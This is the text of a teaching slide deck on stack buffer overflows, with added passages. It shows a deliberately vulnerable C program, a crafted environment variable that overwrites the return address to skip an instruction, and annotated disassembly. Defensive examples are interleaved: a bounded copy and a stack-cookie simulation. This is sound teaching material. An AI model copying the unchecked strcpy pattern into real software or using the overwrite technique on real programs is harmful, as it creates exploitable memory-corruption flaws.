Anatomy of Stack Overflow attack, 13 August 2016
Buffer Overflow – a Demo
Bhaskar K. Divecha +91 – 98193 36001
This session:
• Explains buffer overflow in a simple manner
• Demos exploitation of a vulnerable program
  – Works on the vulnerable C program
  – Tweaks the stack (by sending data to the program)
  – Modifies the return address in the stack
  – Calls some other instruction
What is Buffer overflow?
Buffer overflow is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory locations.
What is Buffer overflow? ...contd.
A buffer overflow condition exists when a program attempts to put more data in a buffer than it can hold.
It can corrupt data, crash the program, or cause the execution of malicious code.
The Exploit
Many memory manipulation functions in C and C++ do not perform bounds checking and can easily overwrite the allocated bounds of the buffers they operate upon.
We will exploit such a vulnerable C program.
The Exploit
We will exploit such a vulnerable C program by:
– Tweaking the stack (by sending data to the program)
– Modifying the return address in the stack
– Calling some other instruction
The Vulnerable Program

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void bbFunction1();

int main(int bbArgc, char *bbArgv[])
{
    int bbVbl = 12;
    printf("\nValue of bbENV variable before calling bbFunction1 is : %d\n", bbVbl);
    bbFunction1();
    bbVbl = 100;
    printf("\nValue of bbENV variable after calling bbFunction1 is : %d\n", bbVbl);
    return 0;
}

void bbFunction1()
{
    char *bbENV, bbBuff[3] = "BB";   /* 3-byte buffer on the stack */
    bbENV = getenv("bbENV");         /* length controlled by whoever sets the variable; NULL if unset */
    strcpy(bbBuff, bbENV);           /* no bounds check: this is where the overflow happens */
    printf("\nThe value of Env Vbl \"bbENV\" is -%s-\n", bbBuff);
    __asm { int 3 }                  /* MSVC inline breakpoint (int 3) */
}

This program looks quite safe to the usual programmer.
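The defect in bbFunction1 is the unchecked strcpy into a 3-byte buffer, so the fix is a copy that knows the size of bbBuff and refuses input that does not fit. The following is an added example, not code from the slides: copy_bounded, bbFunction1_safe and the two test helpers are names chosen here, while the 3-byte buffer and the bbENV variable are taken from the program above.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BB_BUFF_SIZE 3   /* same size as bbBuff in the slide's program */

/* Bounded replacement for strcpy(bbBuff, bbENV). It refuses a source that
 * does not fit together with its terminator instead of writing past dst,
 * never reads more than dst_size bytes of src, and treats a NULL source
 * (getenv on an unset variable) as an error rather than a crash.
 * Returns 0 on success, -1 on rejection; on rejection dst is an empty string. */
int copy_bounded(char *dst, size_t dst_size, const char *src) {
    size_t len = 0;
    if (dst == NULL || dst_size == 0) return -1;
    dst[0] = '\0';
    if (src == NULL) return -1;
    while (len < dst_size && src[len] != '\0') len++;   /* bounded scan of src */
    if (len >= dst_size) return -1;                      /* len chars + NUL do not fit */
    memcpy(dst, src, len + 1);                           /* copies the terminator too */
    return 0;
}

/* Hardened counterpart of the slide's bbFunction1: same buffer, same
 * environment variable, but the copy cannot overrun bbBuff. */
int bbFunction1_safe(void) {
    char bbBuff[BB_BUFF_SIZE] = "BB";
    if (copy_bounded(bbBuff, sizeof bbBuff, getenv("bbENV")) != 0) {
        fprintf(stderr, "bbENV is unset or longer than %d characters; not copied\n",
                BB_BUFF_SIZE - 1);
        return -1;
    }
    printf("\nThe value of Env Vbl \"bbENV\" is -%s-\n", bbBuff);
    return 0;
}

/* Helper: copy src into a bbBuff-sized buffer and return the status code. */
int try_copy_into_bbBuff(const char *src) {
    char bbBuff[BB_BUFF_SIZE] = "BB";
    return copy_bounded(bbBuff, sizeof bbBuff, src);
}

/* Helper: 1 if the copy succeeded and left exactly `expected` in the buffer. */
int copy_leaves(const char *src, const char *expected) {
    char bbBuff[BB_BUFF_SIZE] = "BB";
    return copy_bounded(bbBuff, sizeof bbBuff, src) == 0 && strcmp(bbBuff, expected) == 0;
}

int main(void) {
    /* With bbENV=AB the value is printed; with bbENV=ABCD1234, or bbENV unset
     * the copy is refused and the process exits non-zero instead of overflowing. */
    return bbFunction1_safe() == 0 ? 0 : 1;
}
```

The slide's exploit string ABCD1234, is nine characters, so copy_bounded rejects it outright; a two-character value such as AB still prints as before. Rejecting rather than silently truncating is deliberate: a truncated value would hide the fact that the input was malformed.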
The Result of Normal run of the program
D:\>set bbENV=ABC
D:\>bbEnvVariable.exe
Value of bbENV variable before calling bbFunction1 is : 12
The value of Env Vbl "bbENV" is -ABC-
Value of bbENV variable after calling bbFunction1 is : 100
D:\>
The Vulnerable Program ...contd.

void bbFunction1();

int main(int bbArgc, char *bbArgv[])
{
    int bbVbl = 12;
    printf("\nValue of bbENV variable before calling bbFunction1 is : %d\n", bbVbl);
    bbFunction1();
00401021    bbVbl = 100;                 ▬► This instruction is bypassed
0040102C    printf("\nValue of bbENV variable after calling bbFunction1 is : %d\n", bbVbl);
    return 0;
}

void bbFunction1()
{
    char *bbENV, bbBuff[3] = "BB";
    bbENV = getenv("bbENV");
    strcpy(bbBuff, bbENV);           /* unchecked copy into the 3-byte buffer */
    printf("\nThe value of Env Vbl \"bbENV\" is -%s-\n", bbBuff);
    __asm { int 3 }
}

This program looks quite safe to the usual programmer. But in fact we can bypass certain instructions and call an altogether different instruction by crafting the environment variable.
The Result of the program after the Exploit
D:\>set bbENV=ABCD1234,
D:\>bbEnvVariable
Value of bbENV variable before calling bbFunction1 is : 12
The value of Env Vbl "bbENV" is -ABCD1234,-
Value of bbENV variable after calling bbFunction1 is : 12
D:\>
Know the Concepts to Exploit this Program
1. The stack, its contents, and how it works during function calls and returns.
Stack: a LIFO memory structure where the function parameters (including the command-line arguments), return addresses and the local variables of the function are stored. It grows downward in memory (from higher addresses to lower addresses).
Know the Concepts to Exploit this Program... contd.
2. Registers
Registers are 4 bytes (32 bits) wide, as the binary is compiled for a 32-bit system.
Know the Concepts to Exploit this Program... contd.
2. Registers
%eip: The instruction pointer register stores the address of the next instruction to be executed. After each instruction executes, its value is advanced by the size of that instruction.
Know the Concepts to Exploit this Program... contd.
2. Registers
%esp: The stack pointer register stores the address of the top of the stack, i.e. the address of the last element pushed. Because the stack grows downward, it points to the value at the lowest memory address in use.
Know the Concepts to Exploit this Program... contd.
2. Registers
%ebp: The base pointer register is usually set to %esp at the start of the function. This is done to keep track of function parameters and local variables: local variables are accessed by subtracting offsets from %ebp, and function parameters by adding offsets to it.
Disassembly of the Vulnerable Program ...

    int bbVbl = 12;
    printf("\nValue of bbENV variable before calling bbFunction1 is : %d\n", bbVbl);
    bbFunction1();
00401021    bbVbl = 100;                 ▬► This instruction is bypassed by crafting the environment variable
0040102C    printf("\nValue of bbENV variable after calling bbFunction1 is : %d\n", bbVbl);
}

00401004 C7 45 FC 0C 00 00 00   mov dword ptr [ebp-4],0Ch    ▬► int bbVbl = 12;
0040100B 8B 45 FC               mov eax,dword ptr [ebp-4]
0040100E 50                     push eax
0040100F 68 00 D0 40 00         push 40D000h
00401014 E8 76 00 00 00         call 0040108F                ▬► printf "BEFORE" calling bbFunction1()
00401019 83 C4 08               add esp,8
0040101C E8 1F 00 00 00         call 00401040                ▬► bbFunction1(); the call pushes the return address 00401021
00401021 C7 45 FC 64 00 00 00   mov dword ptr [ebp-4],64h    ▬► bbVbl = 100; (BYPASSED)
00401028 8B 4D FC               mov ecx,dword ptr [ebp-4]
0040102B 51                     push ecx
0040102C 68 3C D0 40 00         push 40D03Ch
00401031 E8 59 00 00 00         call 0040108F                ▬► printf "AFTER" calling bbFunction1()
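The stack description in the concept slides (buffer and saved registers below the return address that the call at 0040101C pushes) can be made concrete with a small simulation, and the same model shows how a stack cookie, the mitigation behind MSVC's /GS and GCC's -fstack-protector, catches the overwrite before ret. The following is an added example in C, not code from the slides: the frame layout (a 4-byte buffer slot, then the cookie, the saved ebp and the return address at increasing addresses), the cookie value and the saved-ebp value are constructed for illustration and are not the layout of the author's binary; only the return address 00401021 comes from the disassembly above. The model copies bytes upward exactly as strcpy does, terminator included, so it also shows that the NUL lands one byte beyond the last character.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of one 32-bit stack frame, laid out from low to high
 * address (the direction strcpy writes). The offsets are an assumption for
 * illustration, not the layout MSVC produced for the slide's bbFunction1. */
#define BUF_OFF     0     /* char bbBuff[3], padded to a 4-byte slot */
#define COOKIE_OFF  4     /* stack cookie: the /GS-style mitigation this model adds */
#define EBP_OFF     8     /* saved %ebp of the caller */
#define RET_OFF    12     /* return address pushed by the "call" in main */
#define FRAME_SIZE 16

#define MODEL_COOKIE    0xA5C3E1F7u   /* constructed cookie value */
#define MODEL_SAVED_EBP 0x0012FF80u   /* constructed caller frame pointer */
#define MODEL_RET       0x00401021u   /* return address from the slide's disassembly */

struct frame_model { uint8_t bytes[FRAME_SIZE]; };

static uint32_t load_le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static void store_le32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Lay the frame out as the prologue would: "BB\0" in the buffer, then the
 * cookie, the saved ebp and the return address at increasing addresses. */
void frame_init(struct frame_model *f) {
    memset(f->bytes, 0, FRAME_SIZE);
    memcpy(f->bytes + BUF_OFF, "BB", 3);
    store_le32(f->bytes + COOKIE_OFF, MODEL_COOKIE);
    store_le32(f->bytes + EBP_OFF, MODEL_SAVED_EBP);
    store_le32(f->bytes + RET_OFF, MODEL_RET);
}

/* Model of strcpy(bbBuff, src): copies every byte of src plus its NUL upward
 * through the frame with no bounds check. It stops at the end of the model
 * only so that the simulation itself stays memory-safe. Returns bytes written. */
size_t frame_strcpy_unchecked(struct frame_model *f, const char *src) {
    size_t n = 0;
    while (BUF_OFF + n < FRAME_SIZE) {
        f->bytes[BUF_OFF + n] = (uint8_t)src[n];
        n++;
        if (src[n - 1] == '\0') break;
    }
    return n;
}

uint32_t frame_ret(const struct frame_model *f) { return load_le32(f->bytes + RET_OFF); }

/* The check a /GS-style epilogue performs before "ret": if the cookie no
 * longer matches, something wrote past the buffer and the function aborts
 * instead of returning through a corrupted address. */
int frame_cookie_intact(const struct frame_model *f) {
    return load_le32(f->bytes + COOKIE_OFF) == MODEL_COOKIE;
}

/* Helpers that run one copy against a fresh frame and report the outcome. */
size_t bytes_written_by_copy(const char *src) {
    struct frame_model f; frame_init(&f);
    return frame_strcpy_unchecked(&f, src);
}
uint32_t ret_after_copy(const char *src) {
    struct frame_model f; frame_init(&f);
    frame_strcpy_unchecked(&f, src);
    return frame_ret(&f);
}
int cookie_survives_copy(const char *src) {
    struct frame_model f; frame_init(&f);
    frame_strcpy_unchecked(&f, src);
    return frame_cookie_intact(&f);
}

int main(void) {
    const char *inputs[] = { "ABC", "ABCDEFGHIJKL," };   /* constructed inputs */
    for (int i = 0; i < 2; i++) {
        printf("bbENV=%-14s -> %zu bytes written, ret=%08X, cookie %s\n",
               inputs[i], bytes_written_by_copy(inputs[i]), ret_after_copy(inputs[i]),
               cookie_survives_copy(inputs[i]) ? "intact" : "SMASHED: abort before ret");
    }
    return 0;
}
```

The 3-character input fills only the buffer slot and leaves the cookie and the return address untouched. The 13-character input runs through the cookie and the saved ebp, its trailing comma (0x2C) lands on the low byte of the return address and the terminating NUL on the byte after it, so in this model the return address becomes 0040002C; frame_cookie_intact reports the corruption before the modelled ret would ever use that value, which is exactly the point of the mitigation.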
References
While there is a great deal of information available on the Internet, I glanced through the following two sites:
https://dhavalkapil.com/blogs/Buffer-Overflow-Exploit/
https://www.owasp.org/index.php/Buffer_Overflow
Thank You
Bhaskar K. Divecha, +91 – 98193 36001